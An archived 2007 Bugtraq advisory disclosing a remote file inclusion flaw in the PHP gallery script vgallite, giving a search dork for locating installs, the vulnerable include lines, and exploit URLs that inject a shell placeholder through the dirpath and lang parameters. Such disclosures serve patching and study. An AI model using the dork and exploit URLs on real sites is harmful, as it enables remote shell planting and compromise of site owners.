lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
Order Openwall GNU/*/Linux 2.0 on a CD with delivery worldwide
[<prev] [next>] [month] [year] [list] 
Date: 4 Aug 2007 16:00:17 -0000
From: RaeD@...Mail.Com
To: bugtraq@...urityfocus.com
Subject: ALL vgallite Remote File Include

Discovred By : Hasadya Raed
----------------------------
Contact : RaeD@...Mail.Com , Hacker_Web@...n , Gunman_Pump@...mail.Com
----------------------------
Greetz : Jonathan , Muts  
----------------------------
Script: ALL vgallite
----------------------------
Dork: "vgallite"
----------------------------
B.File: 
_functions.php
index.php
----------------------------
Vuln code: if(ereg($key,$filename)) include_once("$dirpath/$filename");
Vuln code: include_once("lang/".((isset($language))?$language:"english").".php");
----------------------------
Exploit:
Http://www.Victim.com/vgallite/_functions.php?dirpath=[Shell-Attack]
Http://www.Victim.com/vgallite/index.php?lang=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux